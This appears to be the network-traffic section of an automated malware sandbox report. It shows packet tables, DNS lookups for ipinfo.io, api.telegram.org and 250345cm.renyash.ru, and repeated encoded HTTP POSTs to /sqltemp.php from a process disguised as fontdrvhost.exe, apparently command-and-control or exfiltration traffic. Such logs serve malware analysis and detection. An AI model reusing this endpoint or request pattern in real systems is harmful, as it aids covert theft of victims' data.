Jan 1, 2025 14:53:49.165874958 CET	50156	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:49.166465998 CET	80	50157	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:49.166620016 CET	50157	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:49.166752100 CET	50157	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:49.171484947 CET	80	50157	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:49.511910915 CET	50157	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:49.516796112 CET	80	50157	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:49.610718012 CET	80	50157	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:49.652363062 CET	50157	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:49.787396908 CET	80	50157	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:49.839871883 CET	50157	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:49.915522099 CET	50158	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:49.920463085 CET	80	50158	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:49.920536995 CET	50158	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:49.920640945 CET	50158	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:49.925426006 CET	80	50158	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:50.277642012 CET	50158	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:50.282591105 CET	80	50158	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:50.365046978 CET	80	50158	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:50.418087006 CET	50158	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:50.544817924 CET	50158	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:50.544847012 CET	50159	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:50.549829960 CET	80	50159	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:50.550215006 CET	80	50158	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:50.550295115 CET	50158	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:50.550338030 CET	50159	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:50.550461054 CET	50159	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:50.555254936 CET	80	50159	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:50.693027973 CET	50160	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:50.697911978 CET	80	50160	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:50.701746941 CET	50160	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:50.706374884 CET	50160	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:50.711172104 CET	80	50160	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:50.906358957 CET	50159	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:50.911201000 CET	80	50159	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:50.911329985 CET	80	50159	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:51.023423910 CET	80	50159	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:51.058682919 CET	50160	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:51.063520908 CET	80	50160	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:51.077636003 CET	50159	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:51.146275043 CET	80	50160	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:51.199249983 CET	50160	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:51.277184010 CET	80	50159	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:51.322377920 CET	50159	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:51.408626080 CET	80	50160	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:51.449255943 CET	50160	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:51.529233932 CET	50159	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:51.529325962 CET	50160	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:51.530371904 CET	50161	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:51.536453009 CET	80	50159	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:51.536523104 CET	50159	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:51.536751032 CET	80	50160	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:51.536789894 CET	50160	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:51.537087917 CET	80	50161	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:51.537153959 CET	50161	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:51.537328959 CET	50161	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:51.542119026 CET	80	50161	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:51.886874914 CET	50161	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:51.891843081 CET	80	50161	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:51.983777046 CET	80	50161	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:52.027381897 CET	50161	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:52.165478945 CET	80	50161	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:52.214879990 CET	50161	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:52.286892891 CET	50161	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:52.286897898 CET	50162	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:52.291718960 CET	80	50162	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:52.291824102 CET	80	50161	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:52.291909933 CET	50162	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:52.291913033 CET	50161	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:52.293652058 CET	50162	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:52.298439026 CET	80	50162	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:52.636948109 CET	50162	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:52.641849995 CET	80	50162	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:52.737909079 CET	80	50162	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:52.777386904 CET	50162	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:53.002363920 CET	80	50162	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:53.061650991 CET	50162	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:53.133655071 CET	50163	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:53.139256954 CET	80	50163	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:53.141731024 CET	50163	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:53.141861916 CET	50163	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:53.146915913 CET	80	50163	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:53.496325970 CET	50163	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:53.502763033 CET	80	50163	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:53.606446981 CET	80	50163	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:53.652386904 CET	50163	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:53.781343937 CET	80	50163	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:53.824276924 CET	50163	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:54.080002069 CET	50163	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:54.086689949 CET	50164	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:54.090404034 CET	80	50163	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:54.090446949 CET	50163	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:54.092329979 CET	80	50164	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:54.092407942 CET	50164	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:54.092643976 CET	50164	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:54.097395897 CET	80	50164	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:54.449357986 CET	50164	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:54.454754114 CET	80	50164	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:54.558806896 CET	80	50164	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:54.607713938 CET	50164	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:54.816668987 CET	80	50164	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:54.871211052 CET	50164	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:54.924984932 CET	50162	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:54.925108910 CET	50081	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:54.925112009 CET	50157	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:54.930722952 CET	50165	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:54.930727005 CET	50164	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:54.935578108 CET	80	50165	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:54.935663939 CET	50165	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:54.935722113 CET	80	50164	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:54.936029911 CET	50164	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:54.936392069 CET	50165	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:54.941175938 CET	80	50165	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:55.300215006 CET	50165	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:55.305047035 CET	80	50165	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:55.406207085 CET	80	50165	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:55.449302912 CET	50165	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:55.580766916 CET	80	50165	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:55.621172905 CET	50165	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:55.695362091 CET	50165	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:55.696157932 CET	50166	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:55.701884031 CET	80	50165	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:55.701940060 CET	50165	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:55.702231884 CET	80	50166	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:55.702296972 CET	50166	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:55.702456951 CET	50166	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:55.708709002 CET	80	50166	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:56.058954000 CET	50166	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:56.065105915 CET	80	50166	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:56.166136980 CET	80	50166	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:56.294760942 CET	50167	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:56.295671940 CET	50166	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:56.300928116 CET	80	50167	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:56.301896095 CET	80	50166	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:56.304071903 CET	50167	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:56.304081917 CET	50166	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:56.304245949 CET	50167	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:56.310219049 CET	80	50167	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:56.463951111 CET	50168	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:56.468820095 CET	80	50168	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:56.472254038 CET	50168	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:56.472393990 CET	50168	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:56.479276896 CET	80	50168	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:56.656558990 CET	50167	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:56.661422014 CET	80	50167	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:56.661607027 CET	80	50167	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:56.824680090 CET	50168	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:56.829639912 CET	80	50168	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:56.850624084 CET	80	50167	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:56.902426958 CET	50167	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:56.968689919 CET	80	50168	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:57.102567911 CET	80	50167	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:57.152417898 CET	50167	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:57.168168068 CET	50168	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:57.227380991 CET	80	50168	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:57.277426958 CET	50168	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:57.354871035 CET	50167	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:57.354957104 CET	50168	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:57.356698990 CET	50169	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:57.359905958 CET	80	50167	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:57.359956980 CET	50167	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:57.360270023 CET	80	50168	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:57.360312939 CET	50168	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:57.361485004 CET	80	50169	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:57.361552000 CET	50169	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:57.361722946 CET	50169	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:57.366494894 CET	80	50169	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:57.715821028 CET	50169	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:57.720762968 CET	80	50169	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:57.825799942 CET	80	50169	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:57.871174097 CET	50169	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:58.121304989 CET	80	50169	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:58.121516943 CET	50169	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:58.126595020 CET	80	50169	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:58.126774073 CET	50169	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:58.241099119 CET	50170	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:58.246260881 CET	80	50170	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:58.246364117 CET	50170	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:58.246509075 CET	50170	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:58.251559973 CET	80	50170	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:58.691876888 CET	80	50170	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:58.746177912 CET	50170	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:54:02.904875994 CET	50170	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:54:02.909862995 CET	80	50170	104.21.38.84	192.168.2.4
Jan 1, 2025 14:54:03.167634010 CET	80	50170	104.21.38.84	192.168.2.4
Jan 1, 2025 14:54:03.215068102 CET	50170	80	192.168.2.4	104.21.38.84

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 1, 2025 14:51:59.667238951 CET	64226	53	192.168.2.4	1.1.1.1
Jan 1, 2025 14:51:59.673897028 CET	53	64226	1.1.1.1	192.168.2.4
Jan 1, 2025 14:52:01.517868042 CET	63820	53	192.168.2.4	1.1.1.1
Jan 1, 2025 14:52:01.525840998 CET	53	63820	1.1.1.1	192.168.2.4
Jan 1, 2025 14:52:06.965109110 CET	61161	53	192.168.2.4	1.1.1.1
Jan 1, 2025 14:52:07.095810890 CET	53	61161	1.1.1.1	192.168.2.4
Jan 1, 2025 14:52:11.730811119 CET	56496	53	192.168.2.4	1.1.1.1
Jan 1, 2025 14:52:11.739497900 CET	53	56496	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 1, 2025 14:51:59.667238951 CET	192.168.2.4	1.1.1.1	0x69a4	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
Jan 1, 2025 14:52:01.517868042 CET	192.168.2.4	1.1.1.1	0x590c	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jan 1, 2025 14:52:06.965109110 CET	192.168.2.4	1.1.1.1	0xfb64	Standard query (0)	250345cm.renyash.ru	A (IP address)	IN (0x0001)	false
Jan 1, 2025 14:52:11.730811119 CET	192.168.2.4	1.1.1.1	0xdfab	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 1, 2025 14:51:59.673897028 CET	1.1.1.1	192.168.2.4	0x69a4	No error (0)	ipinfo.io	34.117.59.81	A (IP address)	IN (0x0001)	false
Jan 1, 2025 14:52:01.525840998 CET	1.1.1.1	192.168.2.4	0x590c	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false
Jan 1, 2025 14:52:07.095810890 CET	1.1.1.1	192.168.2.4	0xfb64	No error (0)	250345cm.renyash.ru	104.21.38.84	A (IP address)	IN (0x0001)	false
Jan 1, 2025 14:52:07.095810890 CET	1.1.1.1	192.168.2.4	0xfb64	No error (0)	250345cm.renyash.ru	172.67.220.198	A (IP address)	IN (0x0001)	false
Jan 1, 2025 14:52:11.739497900 CET	1.1.1.1	192.168.2.4	0xdfab	No error (0)	ipinfo.io	34.117.59.81	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ipinfo.io

api.telegram.org

250345cm.renyash.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:07.106208086 CET	318	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:07.465198040 CET	344	OUT	Data Raw: 00 01 04 06 06 0e 04 05 05 06 02 01 02 04 01 01 00 06 05 0f 02 0d 03 09 01 01 0a 06 05 02 01 50 0f 56 04 01 03 04 07 00 0e 57 02 0b 07 01 04 02 05 03 0f 01 0a 05 04 52 01 07 03 05 06 01 04 01 01 0b 0e 0b 07 54 04 08 0e 00 0b 0f 0c 0d 0c 06 02 00 Data Ascii: PVWRTUV\L}ThNbMca}LbetO\|lvXclLhZs_xllXl^_^CsT`IcZe~V@@xSbbu
Jan 1, 2025 14:52:07.558592081 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:07.825913906 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pi8MQGShCUyzcczhtLSXbeu%2FJdkAv8gfmyBhHDb2rjKS28jkU5tWOfdMzWwJB3fL3pvteKCkliPkofiGu0yksulXXrtvNOJgfReD0bcICnM%2BdBR1OIgLEJjDSM9Ox7Gxt9FU6jSa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fceeff15729b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2050&min_rtt=2016&rtt_var=824&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=662&delivery_rate=637554&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 34 38 0d 0a 56 4a 7d 5c 78 7e 6b 02 79 71 64 4b 7f 72 63 4a 6a 67 73 08 7f 5e 7d 4f 6e 73 6c 4d 6a 62 67 58 76 73 76 54 79 58 7e 5f 62 76 55 5f 7e 61 78 01 55 4b 72 55 74 5c 68 59 7f 4c 57 06 7c 67 5f 51 79 76 55 54 7e 70 63 01 75 72 75 41 77 72 7d 47 68 58 69 5d 7e 6c 74 0d 69 67 7f 00 75 4c 7b 06 7c 5c 6d 00 6a 5e 5f 07 78 74 60 01 6f 5e 73 5f 6c 7e 63 02 7a 5c 78 46 7b 70 7e 4f 6b 63 7f 5f 7b 77 60 49 7d 61 78 5f 77 61 7c 05 7a 51 41 5b 6b 49 52 0a 68 71 58 52 75 42 73 5a 7b 6c 70 00 60 5e 71 50 7a 07 71 03 7e 42 57 5e 6c 61 66 00 75 73 7f 00 61 62 73 5d 76 62 62 50 7e 5d 7a 06 76 62 6d 07 76 66 74 09 7e 6c 65 01 77 6f 7f 5d 68 5a 7c 00 78 6f 6c 5a 7b 06 76 4b 6b 6d 5a 08 77 77 6f 5d 7e 62 72 09 7e 6e 7c 53 78 7d 65 5f 7d 5b 6a 5b 7b 5d 46 51 7c 6f 68 43 7d 59 77 55 6a 49 62 4c 6f 7d 60 59 78 72 7b 5c 7f 61 63 03 7d 59 60 52 6b 60 76 50 79 63 70 04 7f 61 78 05 60 5d 71 51 7b 5c 79 4a 75 48 64 4a 7e 58 70 06 7d 66 6d 4f 74 72 55 03 7c 72 57 05 7c 67 50 41 7b 66 6c 0c 7e 4d 67 01 75 4c 7d 06 77 [TRUNCATED] Data Ascii: 548VJ}\x~kyqdKrcJjgs^}OnslMjbgXvsvTyX~_bvU_~axUKrUt\hYLW\|g_QyvUT~pcuruAwr}GhXi]~ltiguL{\|\mj^_xt`o^s_l~cz\xF{p~Okc_{w`I}ax_wa\|zQA[kIRhqXRuBsZ{lp`^qPzq~BW^lafusabs]vbbP~]zvbmvft~lewo]hZ\|xolZ{vKkmZwwo]~br~n\|Sx}e_}[j[{]FQ\|ohC}YwUjIbLo}`Yxr{\ac}Y`Rk`vPycpax`]qQ{\yJuHdJ~Xp}fmOtrU\|rW\|gPA{fl~MguL}wO[H~qjI~\|x~IYv_QHzb[~`_D{I\|{IlOy}gKz\VzsrAN^xw\|~Lowa\|~\|g}gh_mu\|\|x\|VHwpryO}G~RP{OvwcUDuqdt_T
Jan 1, 2025 14:52:07.825967073 CET	915	IN	Data Raw: 7f 60 50 06 74 62 69 4c 76 65 78 0d 7f 52 61 07 77 52 70 4d 7f 4d 60 03 78 52 51 03 7a 60 7a 4a 7c 53 68 41 74 77 68 07 7e 5c 7a 0b 7c 7d 6f 0d 78 6d 7e 4c 7e 62 5b 06 7d 70 52 4f 7f 7c 5e 43 7f 60 60 40 7d 49 7e 07 78 53 59 49 7b 72 70 48 7c 61 Data Ascii: `PtbiLvexRawRpMM`xRQz`zJ\|ShAtwh~\z\|}oxm~L~b[}pRO\|^C``@}I~xSYI{rpH\|aU~IUO\|Nyz]RB}LlFt]W{auvfp~XZfyvrwbq\|wjxv\|A}Mku\utOaJ~qz~lpC}IUvOH{Ly\|p_{wxNywhxS{y\x{]\{]NZ{^gX}LoNv_l\|oK^wU\|y@uBZ{BdcpvyanZ~lz_z\y
Jan 1, 2025 14:52:07.863492966 CET	294	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 384 Expect: 100-continue
Jan 1, 2025 14:52:07.959615946 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:07.960716009 CET	384	OUT	Data Raw: 53 54 5a 57 51 5f 54 55 58 56 52 59 56 58 59 5f 5b 5c 54 5d 55 5e 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: STZWQ_TUXVRYVXY_[\T]U^PYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.'/%[ $.$/*># ??T> 4"7[+5&:&Y.,Y-%
Jan 1, 2025 14:52:08.213924885 CET	961	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bTE5u2oWCRUJOMKWX2nn3dPqHZ%2Fw%2Ff7i7WA9kHOW69X4GCN98fk%2FChnvVAgApBh3DsK4Ntn7dJyVtj%2FHAdgBFiAs7vLGO7elfveSEvfPWFhFx1rjgEgR%2BmWLbOjVqd4wbqPV4yG5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fcf178d3729b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3721&min_rtt=1929&rtt_var=3831&sent=9&recv=9&lost=0&retrans=0&sent_bytes=2201&recv_bytes=1340&delivery_rate=2198795&cwnd=252&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1f 25 57 28 3d 32 54 32 1c 20 1e 3c 13 33 1f 32 00 2e 59 2b 16 36 5f 27 10 3c 00 3d 29 33 5a 35 2f 36 03 26 16 30 5a 23 2d 20 01 33 0e 2b 59 05 1c 20 0b 35 06 2c 5b 28 2d 2b 15 32 01 08 04 24 2e 24 59 2b 3b 30 1e 34 05 33 1d 27 04 28 5d 2a 04 0e 54 27 02 01 16 2d 06 21 56 26 3a 2c 54 00 11 26 57 30 0f 38 1b 23 27 0e 5a 36 31 3d 5f 25 34 29 0f 26 3c 0d 53 37 5f 21 05 31 54 20 07 35 1d 3a 5f 25 28 32 00 37 3d 0e 0a 2a 2e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%W(=2T2 <32.Y+6_'<=)3Z5/6&0Z#- 3+Y 5,[(-+2$.$Y+;043'(]T'-!V&:,T&W08#'Z61=_%4)&<S7_!1T 5:_%(27=.%S -H?WS0
Jan 1, 2025 14:52:08.358175039 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1508 Expect: 100-continue
Jan 1, 2025 14:52:08.454843044 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:08.455132008 CET	1508	OUT	Data Raw: 53 57 5f 5d 54 58 54 54 58 56 52 59 56 58 59 5f 5b 5c 54 5c 55 55 50 5c 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SW_]TXTTXVRYVXY_[\T\UUP\Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-$<5X7)_$;D.)R!.0+9<(=# T48>1$.&Y.,Y-%
